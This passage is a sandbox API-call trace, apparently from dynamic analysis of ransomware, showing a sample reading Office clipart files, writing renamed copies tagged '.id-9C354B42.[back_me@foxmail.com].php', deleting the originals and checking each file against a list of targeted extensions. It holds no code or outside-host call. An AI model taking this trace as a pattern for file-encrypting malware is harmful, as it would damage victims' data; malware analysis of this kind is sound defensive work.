nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.666] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.666] SetEndOfFile (hFile=0x3d8) returned 1 [0259.666] CloseHandle (hObject=0x3d8) returned 1 [0259.666] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.666] SetEndOfFile (hFile=0x210) returned 1 [0259.668] CloseHandle (hObject=0x210) returned 1 [0259.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf")) returned 1 [0259.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.670] lstrlenW (lpString=".doc") returned 4 [0259.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.670] lstrlenW (lpString=".docx") returned 5 [0259.670] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0259.670] lstrlenW (lpString=".pdf") returned 4 [0259.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.670] lstrlenW (lpString=".xls") returned 4 [0259.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.670] lstrlenW (lpString=".xlsx") returned 5 [0259.670] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0259.670] lstrlenW (lpString=".ppt") returned 4 [0259.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.670] lstrlenW (lpString=".zip") returned 4 [0259.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.670] lstrlenW (lpString=".rar") returned 4 [0259.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.670] lstrlenW (lpString=".bz2") returned 4 [0259.670] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.670] lstrlenW (lpString=".7z") returned 3 [0259.670] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.670] lstrlenW (lpString=".dbf") returned 4 [0259.670] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.670] lstrlenW (lpString=".1cd") returned 4 [0259.670] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.670] lstrlenW (lpString=".jpg") returned 4 [0259.670] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.671] lstrlenW (lpString=".doc") returned 4 [0259.671] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString=".docx") returned 5 [0259.671] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0259.671] lstrlenW (lpString=".pdf") returned 4 [0259.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString=".xls") returned 4 [0259.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.671] lstrlenW (lpString=".xlsx") returned 5 [0259.671] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0259.671] lstrlenW (lpString=".ppt") returned 4 [0259.671] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.671] lstrlenW (lpString=".zip") returned 4 [0259.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.671] lstrlenW (lpString=".rar") returned 4 [0259.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString=".bz2") returned 4 [0259.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString=".7z") returned 3 [0259.671] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.671] lstrlenW (lpString=".dbf") returned 4 [0259.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.671] lstrlenW (lpString=".1cd") returned 4 [0259.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63 [0259.671] lstrlenW (lpString=".jpg") returned 4 [0259.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.672] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.672] lstrlenW (lpString="J0105338.WMF") returned 12 [0259.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.672] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=11584) returned 1 [0259.672] CloseHandle (hObject=0x210) returned 1 [0259.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf")) returned 0x20 [0259.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0259.672] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.672] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0259.673] GetLastError () returned 0x0 [0259.673] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2d40, lpOverlapped=0x0) returned 1 [0259.911] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2d50, lpOverlapped=0x0) returned 1 [0259.912] ReadFile (in: hFile=0x210, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.912] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.912] SetEndOfFile (hFile=0x3d8) returned 1 [0259.912] CloseHandle (hObject=0x3d8) returned 1 [0259.912] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.912] SetEndOfFile (hFile=0x210) returned 1 [0259.916] CloseHandle (hObject=0x210) returned 1 [0259.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.947] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf")) returned 1 [0259.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.964] lstrlenW (lpString=".doc") returned 4 [0259.964] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString=".docx") returned 5 [0259.964] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0259.964] lstrlenW (lpString=".pdf") returned 4 [0259.964] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString=".xls") returned 4 [0259.964] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.964] lstrlenW (lpString=".xlsx") returned 5 [0259.964] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0259.964] lstrlenW (lpString=".ppt") returned 4 [0259.964] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.964] lstrlenW (lpString=".zip") returned 4 [0259.964] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.964] lstrlenW (lpString=".rar") returned 4 [0259.964] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString=".bz2") returned 4 [0259.964] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString=".7z") returned 3 [0259.964] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.964] lstrlenW (lpString=".dbf") returned 4 [0259.964] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.964] lstrlenW (lpString=".1cd") returned 4 [0259.964] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.964] lstrlenW (lpString=".jpg") returned 4 [0259.964] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.965] lstrlenW (lpString=".doc") returned 4 [0259.965] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.965] lstrlenW (lpString=".docx") returned 5 [0259.965] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0259.965] lstrlenW (lpString=".pdf") returned 4 [0259.965] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.965] lstrlenW (lpString=".xls") returned 4 [0259.965] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.965] lstrlenW (lpString=".xlsx") returned 5 [0259.965] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0259.965] lstrlenW (lpString=".ppt") returned 4 [0259.965] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.965] lstrlenW (lpString=".zip") returned 4 [0259.965] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.965] lstrlenW (lpString=".rar") returned 4 [0259.965] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.965] lstrlenW (lpString=".bz2") returned 4 [0259.965] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.965] lstrlenW (lpString=".7z") returned 3 [0259.965] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.965] lstrlenW (lpString=".dbf") returned 4 [0259.965] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.965] lstrlenW (lpString=".1cd") returned 4 [0259.965] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF") returned 63 [0259.965] lstrlenW (lpString=".jpg") returned 4 [0259.965] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.966] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.966] lstrlenW (lpString="J0106020.WMF") returned 12 [0259.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0259.966] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=10060) returned 1 [0259.966] CloseHandle (hObject=0x384) returned 1 [0259.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf")) returned 0x20 [0259.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0259.966] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.966] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0259.967] GetLastError () returned 0x0 [0259.967] ReadFile (in: hFile=0x384, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x274c, lpOverlapped=0x0) returned 1 [0260.039] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2750, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2750, lpOverlapped=0x0) returned 1 [0260.040] ReadFile (in: hFile=0x384, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.040] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.040] SetEndOfFile (hFile=0x3e8) returned 1 [0260.040] CloseHandle (hObject=0x3e8) returned 1 [0260.040] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.040] SetEndOfFile (hFile=0x384) returned 1 [0260.042] CloseHandle (hObject=0x384) returned 1 [0260.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0260.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf")) returned 1 [0260.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.044] lstrlenW (lpString=".doc") returned 4 [0260.044] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString=".docx") returned 5 [0260.044] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0260.044] lstrlenW (lpString=".pdf") returned 4 [0260.044] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString=".xls") returned 4 [0260.044] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.044] lstrlenW (lpString=".xlsx") returned 5 [0260.044] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0260.044] lstrlenW (lpString=".ppt") returned 4 [0260.044] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.044] lstrlenW (lpString=".zip") returned 4 [0260.044] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.044] lstrlenW (lpString=".rar") returned 4 [0260.044] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString=".bz2") returned 4 [0260.044] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString=".7z") returned 3 [0260.044] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.044] lstrlenW (lpString=".dbf") returned 4 [0260.044] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.044] lstrlenW (lpString=".1cd") returned 4 [0260.044] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.044] lstrlenW (lpString=".jpg") returned 4 [0260.044] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.045] lstrlenW (lpString=".doc") returned 4 [0260.045] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.045] lstrlenW (lpString=".docx") returned 5 [0260.045] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0260.045] lstrlenW (lpString=".pdf") returned 4 [0260.045] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.045] lstrlenW (lpString=".xls") returned 4 [0260.045] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.045] lstrlenW (lpString=".xlsx") returned 5 [0260.045] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0260.045] lstrlenW (lpString=".ppt") returned 4 [0260.045] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.045] lstrlenW (lpString=".zip") returned 4 [0260.045] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.045] lstrlenW (lpString=".rar") returned 4 [0260.045] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.045] lstrlenW (lpString=".bz2") returned 4 [0260.045] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.045] lstrlenW (lpString=".7z") returned 3 [0260.045] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.045] lstrlenW (lpString=".dbf") returned 4 [0260.045] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.045] lstrlenW (lpString=".1cd") returned 4 [0260.045] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63 [0260.045] lstrlenW (lpString=".jpg") returned 4 [0260.045] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.046] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0260.046] lstrlenW (lpString="J0106222.WMF") returned 12 [0260.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0260.065] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=19600) returned 1 [0260.065] CloseHandle (hObject=0x398) returned 1 [0260.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf")) returned 0x20 [0260.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0260.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0260.067] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.067] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0260.067] GetLastError () returned 0x0 [0260.067] ReadFile (in: hFile=0x398, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x4c90, lpOverlapped=0x0) returned 1 [0260.071] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x4ca0, lpOverlapped=0x0) returned 1 [0260.072] ReadFile (in: hFile=0x398, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.072] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.072] SetEndOfFile (hFile=0x3d8) returned 1 [0260.072] CloseHandle (hObject=0x3d8) returned 1 [0260.072] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.072] SetEndOfFile (hFile=0x398) returned 1 [0260.074] CloseHandle (hObject=0x398) returned 1 [0260.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0260.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 